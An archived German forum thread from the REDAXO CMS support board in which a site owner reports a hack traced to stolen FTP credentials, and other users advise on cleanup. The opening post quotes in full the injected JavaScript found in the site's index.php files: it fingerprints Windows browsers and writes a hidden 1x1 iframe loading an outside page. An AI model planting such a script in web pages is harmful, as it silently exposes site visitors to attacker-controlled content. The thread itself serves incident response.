Hallo,

Wir haben in letzter Zeit festgestellt, dass die Kommunikation via Slack viel schneller und zielführender ist als ein Beitrag im Forum. Aufgrund der neuen und besseren Möglichkeiten der Kommunikation haben wir uns entschlossen das Forum nur noch als Archiv zur Verfügung zu stellen. Somit bleibt es weiterhin möglich hier nach Lösungen zu suchen. Neue Beiträge können nicht mehr erstellt werden.

Wir empfehlen, für deine Fragen/Probleme Slack zu nutzen. Dort sind viele kompetente Benutzer aktiv und beantworten jegliche Fragen, gerne auch von REDAXO-Anfängern! Slack wird von uns sehr intensiv und meistens "rund um die Uhr" benutzt :-)
Selbst einladen kannst Du dich hier: http://redaxo.org/slack/
robert

Webseite mit Redaxo 3.2 gehackt

12. Feb 2012, 21:05

Hallo,

ich habe gerade per Mail die Meldung von Google bekommen, das meine Webseite infiziert wurde. Ich habe daraufhin als erstes per FTP auf die Seite zugegriffen und fand im Root-Verzeichnis eine Datei "Session.php" diese habe ich leider vorschnell gelöscht.

Leider befindet sich im Quelltext des Redaxo-outputs immer noch ein Script, das dort nicht hingehört!

Dieses Script befindet sich am Ende der Seitenquelltextes:

Code: Alles auswählen

<script type="text/javascript">function get_cookie(Name) {	var search = Name + "=";	var returnvalue = "";	if (document.cookie.length > 0) {		offset = document.cookie.indexOf(search);		if (offset != -1) { 			offset += search.length;			end = document.cookie.indexOf(";", offset);			if (end == -1)			end = document.cookie.length;			returnvalue=unescape(document.cookie.substring(offset, end));		}	}	return returnvalue;}function set_cookie(name, value) {    var cxdate = new Date();    cxdate.setYear(2024);    cxdate.setMonth(3);    cxdate.setDate(3);    document.cookie = name + '=' + escape(value) + ';expires=' + cxdate.toGMTString() + ';path=/';}var br_reg = /(Firefox|MSIE)/i;var usr_os = navigator.userAgent;if(get_cookie('toppedup') == '' && usr_os.match(/Windows/i) && usr_os.match(br_reg)) {	document.write('<iframe frameborder=0 height=1 width=1 scrolling=no src="http://www.hausauto.de/index.php"> </iframe>');	set_cookie('toppedup', '1010101');}</script>
Wo muss ich suchen um das Script zuentfernen?

Edit:
Es wurde Redaxo nicht angriffen. Es wurde die index.php im root und die index.php im redaxo-Ordner manipuliert. Die Zeilen habe ich entfernt.

Heute morgen wurde wieder die index.php im root mit einem script versehen, ich habe erstmal die Dateiberechtigung von 644 auf 444 geändert. Mal aschauen ob es hilft. Alles weitere werde ich mit dem Provider absprechen.

MfG
Robert
Zuletzt geändert von robert am 13. Feb 2012, 09:26, insgesamt 2-mal geändert.

Benutzeravatar
Cheffchen
Beiträge: 1809
Registriert: 3. Mär 2009, 13:51
Wohnort: Berlin
Kontaktdaten: Website

Re: Redaxo 3.2 gehackt

12. Feb 2012, 22:10

Hallo,

also ändere bitte denn titel, denn nicht redxo sondern dein rechner wurde gehakt :O).

Ändere FTP zugang sonnst macht nichts sin.
->
Hast filzilla und speicherst pw?
->
Änder alle FTP zugänge die noch gespeichert hast.

Mach erstmal nichts mit FTP auser änderungsdatum der index aufschreiben und die umbenennen und dann ein statisch hinsetzten, seite ist in wartung oder was auch immer :O).
ist bestimmt in alles index seiten der javascript code und vielleicht noch in anderen.
in index.php hat sowas aber nichts zu suchen :O).

Hattest spezielle änderungen im System Redaxo?
wenn nein. master.inc runterladen und checken, redaxo ordner sichern und löschen (natürlich ohne files) und neu hochspielen inkl den alten Master.inc und schon gehts wieder.

Cheffchen

robert

Re: Webseite mit Redaxo 3.2 gehackt

13. Feb 2012, 10:34

Hallo,

das Problem ist gelöst, der Angriff kam per FTP aus Lettland. Der Angreifer hatte laut Provider die ftp-Zugangsdaten.

Ich verwende wie vermutet Filezilla, ich habe die Passwörter erst einmal gelöscht und das Protokoll auf SFTP umgestellt. Die Zugangsdaten sind von dem Provider geändert worden.

MfG
Robert

Benutzeravatar
Cheffchen
Beiträge: 1809
Registriert: 3. Mär 2009, 13:51
Wohnort: Berlin
Kontaktdaten: Website

Re: Webseite mit Redaxo 3.2 gehackt

13. Feb 2012, 11:16

Hallo,

also das FTP Datengeändert sind ist schon mal gut.
Protokoll auf SFTP bringt nichts da nicht die verbindung sondern dein Rechner das Problem ist, aber PW hast ja gelöscht und darfst auch nie Speichern in Filezilla, da der das in Klartext abspeichert an einem festen ort und da brauchst bloss als haker den Orndnerabfragen und schon hast alle Daten :O).

So am sichersten ist redaxo neu aufsetzten, mach zuerst eine Sicherung per FTP von allen Daten und zweitens per mysql von der Datenbank.
Hast Spezielle änderungen am System gemacht oder Addons genutzt ausser die sytem sachen?

Hm, das habe ich doch schon alles geschrieben :O).
Im Grunde brauchst keine große Angst haben, da CMS und da sind alle Daten in der Datenbank also nichts geht verloren, wenn jetzt kein fehler machst :O).

Cheffchen

robert

Re: Webseite mit Redaxo 3.2 gehackt

13. Feb 2012, 11:39

Hallo,

danke für die Antwort, die Passwörter werde ich in Filezilla nicht mehr speichern. Das System ist jetzt sauber, die redaxo installation war nicht betroffen. Laut ftp-log wurde nur auf die index.php dateien zugegriffen.

Ich werde erst einmal mit einer Linux-Viren-CD alle Rechner scannen, um auszuschliessen, das sich doch ein Schadcode eingenistet hat, der die Passwörter lauscht. Die Zugangspasswörter hängen jetzt wieder wie ganz früher an der Pinwand.

MfG
Robert

Benutzeravatar
Ruediger.Nitzsche
Beiträge: 2117
Registriert: 13. Dez 2005, 09:29
Wohnort: Coburg
Kontaktdaten: Website

Re: Webseite mit Redaxo 3.2 gehackt

19. Feb 2012, 22:32

gn2 netwerk | gn2 hosting | REDAXO Referenzen | Github
Supportanfragen per PN werden gepflegt ignoriert

Zurück zu „Allgemeines [R3]“